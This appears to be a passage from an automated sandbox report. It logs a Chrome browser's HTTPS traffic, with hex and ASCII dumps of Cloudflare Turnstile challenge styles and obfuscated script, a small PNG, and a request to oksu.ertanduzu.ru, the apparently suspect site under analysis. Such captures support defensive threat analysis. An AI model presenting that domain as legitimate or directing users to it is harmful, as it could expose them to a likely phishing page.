                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                                                                                                                                                                                Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                                                                                                                                                                Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                                                                                                                                                                Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                                                                                                                                                                2024-12-20 15:46:05 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                                                                                                                                                                Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                58192.168.2.1149890104.18.94.414436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:06 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f50c3606cea43b9&lang=auto HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/afqfh/0x4AAAAAAA2Jt48AqtrtyRlV/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:07 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:07 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 125889
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c36b1ad50f5d-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:46:07 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                                                                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                                                                                                                                                                                                2024-12-20 15:46:07 UTC1369INData Raw: 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 69 6d 65 5f 63 68 65
                                                                                                                                                                                                                                                Data Ascii: t%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","time_che
                                                                                                                                                                                                                                                2024-12-20 15:46:07 UTC1369INData Raw: 2c 66 56 2c 67 37 2c 67 64 2c 67 65 2c 67 66 2c 67 70 2c 67 41 2c 67 45 2c 65 4f 2c 65 50 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 31 35 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 33 32 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 35 35 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 37 34 39 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 39 38 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 37 38 35 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 35 34 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38
                                                                                                                                                                                                                                                Data Ascii: ,fV,g7,gd,ge,gf,gp,gA,gE,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(415))/1*(parseInt(gI(1032))/2)+parseInt(gI(1355))/3+parseInt(gI(749))/4+-parseInt(gI(698))/5*(parseInt(gI(785))/6)+parseInt(gI(1154))/7+-parseInt(gI(8
                                                                                                                                                                                                                                                2024-12-20 15:46:07 UTC1369INData Raw: 68 59 28 31 32 30 36 29 5d 28 48 2c 31 29 5d 29 3f 47 5b 68 59 28 34 30 31 29 5d 28 6f 5b 68 59 28 31 32 30 36 29 5d 28 48 2c 31 29 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 58 28 31 38 35 37 29 5d 5b 68 58 28 31 32 39 32 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 68 58 28 31 38 36 37 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 66 75 28 67 2c 68 2c 44 29 2c 42 28 45 29 3f 28 46 3d 45 3d 3d 3d 27 73 27 26 26 21 67 5b 68 58 28 39 38 39 29 5d 28 68 5b 44 5d 29 2c 6f 5b 68 58 28 33 38 38 29 5d 28 68 58 28 31 33 37 33 29 2c 6f 5b 68 58 28 31 30 34 31 29 5d 28 69 2c 44 29 29 3f 73 28 6f 5b 68 58 28 31 30 34 31 29 5d 28 69 2c 44 29 2c 45 29 3a 46 7c 7c 73 28 69
                                                                                                                                                                                                                                                Data Ascii: hY(1206)](H,1)])?G[hY(401)](o[hY(1206)](H,1),1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[hX(1857)][hX(1292)](B),C=0;C<x[hX(1867)];D=x[C],E=fu(g,h,D),B(E)?(F=E==='s'&&!g[hX(989)](h[D]),o[hX(388)](hX(1373),o[hX(1041)](i,D))?s(o[hX(1041)](i,D),E):F||s(i
                                                                                                                                                                                                                                                2024-12-20 15:46:07 UTC1369INData Raw: 7b 27 65 74 41 6e 53 27 3a 69 32 28 31 34 39 39 29 2c 27 43 43 57 6f 67 27 3a 69 32 28 38 34 38 29 2c 27 5a 43 70 45 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 3d 68 7d 2c 27 78 41 50 63 4c 27 3a 69 32 28 31 34 38 34 29 2c 27 52 4b 62 58 49 27 3a 69 32 28 31 32 38 31 29 2c 27 43 48 70 42 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 51 49 53 74 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 4d 72 6e 5a 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 76 66 49 61 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 57 4a 51 4d 71 27 3a 66 75 6e 63 74 69
                                                                                                                                                                                                                                                Data Ascii: {'etAnS':i2(1499),'CCWog':i2(848),'ZCpEg':function(h,i){return i!==h},'xAPcL':i2(1484),'RKbXI':i2(1281),'CHpBi':function(h,i){return h==i},'QIStb':function(h,i){return h-i},'MrnZA':function(h,i){return h>i},'vfIam':function(h,i){return h|i},'WJQMq':functi
                                                                                                                                                                                                                                                2024-12-20 15:46:07 UTC1369INData Raw: 65 74 75 72 6e 20 69 34 3d 69 33 2c 6a 5b 69 34 28 31 30 35 30 29 5d 5b 69 34 28 31 32 31 32 29 5d 28 6b 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 69 35 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 29 7b 69 66 28 69 35 3d 69 32 2c 69 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d 30 2c 4a 3d 30 3b 4a 3c 69 5b 69 35 28 31 38 36 37 29 5d 3b 4a 2b 3d 31 29 69 66 28 64 5b 69 35 28 31 33 31 33 29 5d 3d 3d 3d 69 35 28 31 37 38 38 29 29 72 65 74 75 72 6e 20 43 3d 3d 6e 75 6c 6c 3f 27 27 3a 69 3d 3d 27 27 3f 6e 75 6c 6c 3a 6a 2e 69 28 4a 5b 69 35 28 31 38 36 37 29 5d 2c
                                                                                                                                                                                                                                                Data Ascii: eturn i4=i3,j[i4(1050)][i4(1212)](k)})},'g':function(i,j,o,i5,s,x,B,C,D,E,F,G,H,I,J,K,L,M){if(i5=i2,i==null)return'';for(x={},B={},C='',D=2,E=3,F=2,G=[],H=0,I=0,J=0;J<i[i5(1867)];J+=1)if(d[i5(1313)]===i5(1788))return C==null?'':i==''?null:j.i(J[i5(1867)],
                                                                                                                                                                                                                                                2024-12-20 15:46:07 UTC1369INData Raw: 35 28 31 32 37 35 29 5d 5b 69 35 28 31 33 38 32 29 5d 28 42 2c 43 29 29 7b 69 66 28 64 5b 69 35 28 31 35 30 33 29 5d 28 32 35 36 2c 43 5b 69 35 28 31 31 31 37 29 5d 28 30 29 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 64 5b 69 35 28 31 32 34 34 29 5d 28 49 2c 64 5b 69 35 28 33 37 37 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 69 35 28 39 32 32 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 69 35 28 31 31 31 37 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 4d 26 31 7c 48 3c 3c 31 2e 32 37 2c 64 5b 69 35 28 31 30 36 35 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 69 35 28 39 32 32 29 5d 28 64 5b 69 35 28 31 32 30 34 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d
                                                                                                                                                                                                                                                Data Ascii: 5(1275)][i5(1382)](B,C)){if(d[i5(1503)](256,C[i5(1117)](0))){for(s=0;s<F;H<<=1,d[i5(1244)](I,d[i5(377)](j,1))?(I=0,G[i5(922)](o(H)),H=0):I++,s++);for(M=C[i5(1117)](0),s=0;8>s;H=M&1|H<<1.27,d[i5(1065)](I,j-1)?(I=0,G[i5(922)](d[i5(1204)](o,H)),H=0):I++,M>>=
                                                                                                                                                                                                                                                2024-12-20 15:46:07 UTC1369INData Raw: 3d 6a 2c 47 3d 64 5b 69 39 28 31 31 37 35 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4c 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4d 3d 64 5b 69 39 28 31 31 37 35 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 39 28 34 36 32 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4c 3d 47 26 48 2c 48 3e 3e 3d 31 2c 64 5b 69 39 28 31 32 34 34 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 69 39 28 34 35 38 29 5d 28 30 2c 4c 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4d 3d 64 5b 69 39 28 37 36 31 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4d 2c 44 5b 69 39 28
                                                                                                                                                                                                                                                Data Ascii: =j,G=d[i9(1175)](o,I++)),J|=(0<L?1:0)*F,F<<=1);M=d[i9(1175)](e,J);break;case 1:for(J=0,K=Math[i9(462)](2,16),F=1;F!=K;L=G&H,H>>=1,d[i9(1244)](0,H)&&(H=j,G=o(I++)),J|=(d[i9(458)](0,L)?1:0)*F,F<<=1);M=d[i9(761)](e,J);break;case 2:return''}for(E=s[3]=M,D[i9(
                                                                                                                                                                                                                                                2024-12-20 15:46:07 UTC1369INData Raw: 75 74 27 3a 65 4d 5b 69 62 28 31 32 31 39 29 5d 5b 69 62 28 31 36 35 38 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 69 62 28 31 32 31 39 29 5d 5b 69 62 28 31 35 30 39 29 5d 2c 27 63 6f 64 65 27 3a 65 5b 69 62 28 39 32 30 29 5d 2c 27 72 63 56 27 3a 65 4d 5b 69 62 28 31 32 31 39 29 5d 5b 69 62 28 31 34 35 32 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4a 28 31 36 31 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 69 63 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 4a 2c 4b 2c 4c 29 7b 6b 3d 28 69 63 3d 67 4a 2c 6a 3d 7b 7d 2c 6a 5b 69 63 28 31 37 36 35 29 5d 3d 69 63 28 31 37 36 37 29 2c 6a 5b 69 63 28 36 39 34 29 5d 3d 69 63 28 31 33 34 32 29 2c 6a 5b 69 63 28 37 31 34 29 5d 3d
                                                                                                                                                                                                                                                Data Ascii: ut':eM[ib(1219)][ib(1658)],'cfChlOutS':eM[ib(1219)][ib(1509)],'code':e[ib(920)],'rcV':eM[ib(1219)][ib(1452)]},'*'))},g)},eM[gJ(1610)]=function(g,h,i,ic,j,k,l,m,n,o,s,x,B,C,D,E,F,G,H,J,K,L){k=(ic=gJ,j={},j[ic(1765)]=ic(1767),j[ic(694)]=ic(1342),j[ic(714)]=
                                                                                                                                                                                                                                                2024-12-20 15:46:07 UTC1369INData Raw: 65 27 31 32 27 3a 45 3d 66 41 28 67 5b 69 63 28 31 36 34 34 29 5d 2c 67 5b 69 63 28 34 39 35 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 33 27 3a 46 3d 6b 5b 69 63 28 34 35 36 29 5d 28 69 2c 69 63 28 31 31 34 30 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 34 27 3a 67 5b 69 63 28 31 36 34 34 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 67 5b 69 63 28 31 36 34 34 29 5d 3d 4a 53 4f 4e 5b 69 63 28 38 31 30 29 5d 28 67 5b 69 63 28 31 36 34 34 29 5d 2c 4f 62 6a 65 63 74 5b 69 63 28 37 34 37 29 5d 28 67 5b 69 63 28 31 36 34 34 29 5d 29 29 3a 67 5b 69 63 28 31 36 34 34 29 5d 3d 4a 53 4f 4e 5b 69 63 28 38 31 30 29 5d 28 67 5b 69 63 28 31 36 34 34 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 35 27 3a 48 3d 28 47 3d 7b
                                                                                                                                                                                                                                                Data Ascii: e'12':E=fA(g[ic(1644)],g[ic(495)]);continue;case'13':F=k[ic(456)](i,ic(1140));continue;case'14':g[ic(1644)]instanceof Error?g[ic(1644)]=JSON[ic(810)](g[ic(1644)],Object[ic(747)](g[ic(1644)])):g[ic(1644)]=JSON[ic(810)](g[ic(1644)]);continue;case'15':H=(G={


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                59192.168.2.1149891104.18.94.414436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:07 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/afqfh/0x4AAAAAAA2Jt48AqtrtyRlV/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:07 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:07 GMT
                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: max-age=2629800, public
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c36c4ade4352-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:46:07 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                60192.168.2.1149861172.67.134.2314436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:08 UTC1321OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                Host: oksu.ertanduzu.ru
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://oksu.ertanduzu.ru/gk59Agp/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
